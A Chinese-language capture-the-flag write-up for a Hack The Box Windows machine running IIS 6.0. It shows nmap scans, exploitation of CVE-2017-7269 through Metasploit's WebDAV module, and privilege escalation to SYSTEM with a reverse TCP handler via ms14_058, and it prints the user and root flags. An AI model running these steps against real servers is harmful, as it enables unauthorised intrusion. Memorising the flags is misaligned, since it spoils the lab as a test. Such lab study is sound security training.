目录

连接至HTB服务器并启动靶机

1.Which version of Microsoft IIS is running on TCP port 80?

2.Which 2017 CVE abuses a Buffer overflow in the ScStoragePathFromUrl function in that specific IIS version, allowing remote attackers to execute arbitrary code?

3.Which metasploit module can be used to exploit the aforementioned CVE?

4.Which metasploit reconnaissance module can be used to list possible privilege escalation paths on a compromised system?

5.Submit the flag located on the Harry user's desktop.

6.Submit the flag located on the administrator's desktop.

USER_FLAG：bdff5ec67c3cff017f2bedc146a5d869

ROOT_FLAG：9359e905a2c35f861f6a57cecf28bb7b

---

连接至HTB服务器并启动靶机

靶机IP：10.10.10.14

分配IP：10.10.16.22

---

1.Which version of Microsoft IIS is running on TCP port 80?

使用nmap扫描靶机TCP开放端口

nmap -p- --min-rate=1500 -sS -Pn 10.10.10.14

┌──(root㉿kali)-[/home/kali/Desktop/temp]
└─# nmap -p- --min-rate=1500 -sS -Pn 10.10.10.14
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-10-30 20:45 EDT
Nmap scan report for 10.10.10.14
Host is up (0.070s latency).
Not shown: 65534 filtered tcp ports (no-response)
PORT   STATE SERVICE
80/tcp open  http

Nmap done: 1 IP address (1 host up) scanned in 87.40 seconds

使用nmap对靶机80端口进行脚本、服务信息扫描

nmap -p 80 -sCV 10.10.10.14

由扫描结果可见，靶机80端口中间件IIS版本为：6.0

---

2.Which 2017 CVE abuses a Buffer overflow in the ScStoragePathFromUrl function in that specific IIS version, allowing remote attackers to execute arbitrary code?

直接在网上搜索关键词可以找到漏洞：CVE-2017-7269

---

3.Which metasploit module can be used to exploit the aforementioned CVE?

启动Metasploit

msfconsole

搜索IIS 6.0相关的模块

search IIS 6.0

结合nmap扫描结果可知，靶机同时还使用了WebDAV则最后一个模块最合适：iis_webdav_scstoragepathfromurl

use exploit/windows/iis/iis_webdav_scstoragepathfromurl

列出该模块可填选项

show options

这里需要填好的选项：RHOSTS、LHOST

输入exploit或run开始漏洞利用

---

4.Which metasploit reconnaissance module can be used to list possible privilege escalation paths on a compromised system?

提权扫描模块在MSF一般指的是：post/multi/recon/local_exploit_suggester

---

5.Submit the flag located on the Harry user's desktop.

6.Submit the flag located on the administrator's desktop.

切换到终端

shell

进入C盘根目录下

cd C:\

尝试直接查找user_flag位置

dir /s user.txt

发现找不到这个文件这很奇怪，很可能是权限不足

执行whoami命令发现当前用户为：nt authority\network service

C:\Documents and Settings>whoami
whoami
nt authority\network service

列出当前目录下所有文件

C:\>dir
dirVolume in drive C has no label.Volume Serial Number is FDCB-B9EFDirectory of C:\04/12/2017  04:27 PM    <DIR>          ADFS
04/12/2017  04:04 PM                 0 AUTOEXEC.BAT
04/12/2017  04:04 PM                 0 CONFIG.SYS
04/12/2017  04:32 PM    <DIR>          Documents and Settings
04/12/2017  04:17 PM    <DIR>          FPSE_search
04/12/2017  04:17 PM    <DIR>          Inetpub
12/24/2017  07:18 PM    <DIR>          Program Files
09/16/2021  11:52 AM    <DIR>          WINDOWS
04/12/2017  04:05 PM    <DIR>          wmpub2 File(s)              0 bytes7 Dir(s)   1,317,928,960 bytes free

进入Documents and Settings目录中

cd "Documents and Settings"

查看该目录下所有文件

C:\Documents and Settings>dir
dirVolume in drive C has no label.Volume Serial Number is FDCB-B9EFDirectory of C:\Documents and Settings04/12/2017  04:32 PM    <DIR>          .
04/12/2017  04:32 PM    <DIR>          ..
04/12/2017  04:12 PM    <DIR>          Administrator
04/12/2017  04:03 PM    <DIR>          All Users
04/12/2017  04:32 PM    <DIR>          Harry0 File(s)              0 bytes5 Dir(s)   1,317,928,960 bytes free

尝试进入Harry目录，提示权限不够~

C:\Documents and Settings>cd Harry
cd Harry
Access is denied.

那就回到Meterpreter，并将其收到会话中

background

切换到提权扫描模块

use post/multi/recon/local_exploit_suggester

运行后，我们选择标绿色的模块尝试哪个可用

选择其中一个提权模块

use exploit/windows/local/ms14_070_tcpip_ioctl

msf6 exploit(windows/local/ms14_070_tcpip_ioctl) > set LHOST 10.10.16.22
LHOST => 10.10.16.22
msf6 exploit(windows/local/ms14_070_tcpip_ioctl) > set LPORT 7878
LPORT => 7878
msf6 exploit(windows/local/ms14_070_tcpip_ioctl) > set SESSION 1
SESSION => 1
msf6 exploit(windows/local/ms14_070_tcpip_ioctl) > run

[*] Started reverse TCP handler on 10.10.16.22:7878
[-] Exploit failed: Rex::Post::Meterpreter::RequestError stdapi_sys_config_getsid: Operation failed: Access is denied.
[*] Exploit completed, but no session was created.

可以看到报错为操作失败无法访问，我们尝试将Meterpreter进程进行迁移

使用进程自动扫描迁移模块：post/windows/manage/migrate

use post/windows/manage/migrate

再次切换到提权模块(我这里随便在标绿模块里又随便选了一个)

use exploit/windows/local/ms14_058_track_popup_menu

查看当前用户

getuid

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM

直接搜索user_flag、root_flag位置

search -f user.txt
search -f root.txt

meterpreter > search -f user.txt
Found 1 result...
=================

Path                                              Size (bytes)  Modified (UTC)
----                                              ------------  --------------
c:\Documents and Settings\Harry\Desktop\user.txt  32            2017-04-12 10:32:26 -0400

meterpreter > search -f root.txt
Found 1 result...
=================

Path                                                      Size (bytes)  Modified (UTC)
----                                                      ------------  --------------
c:\Documents and Settings\Administrator\Desktop\root.txt  32            2017-04-12 10:29:33 -0400

查看user_flag、root_flag内容

meterpreter > shell
Process 2148 created.
Channel 1 created.
Microsoft Windows [Version 5.2.3790]
(C) Copyright 1985-2003 Microsoft Corp.

c:\windows\system32\inetsrv>type "c:\Documents and Settings\Harry\Desktop\user.txt"
type "c:\Documents and Settings\Harry\Desktop\user.txt"
bdff5ec67c3cff017f2bedc146a5d869
c:\windows\system32\inetsrv>type "c:\Documents and Settings\Administrator\Desktop\root.txt"
type "c:\Documents and Settings\Administrator\Desktop\root.txt"
9359e905a2c35f861f6a57cecf28bb7b

USER_FLAG：bdff5ec67c3cff017f2bedc146a5d869

ROOT_FLAG：9359e905a2c35f861f6a57cecf28bb7b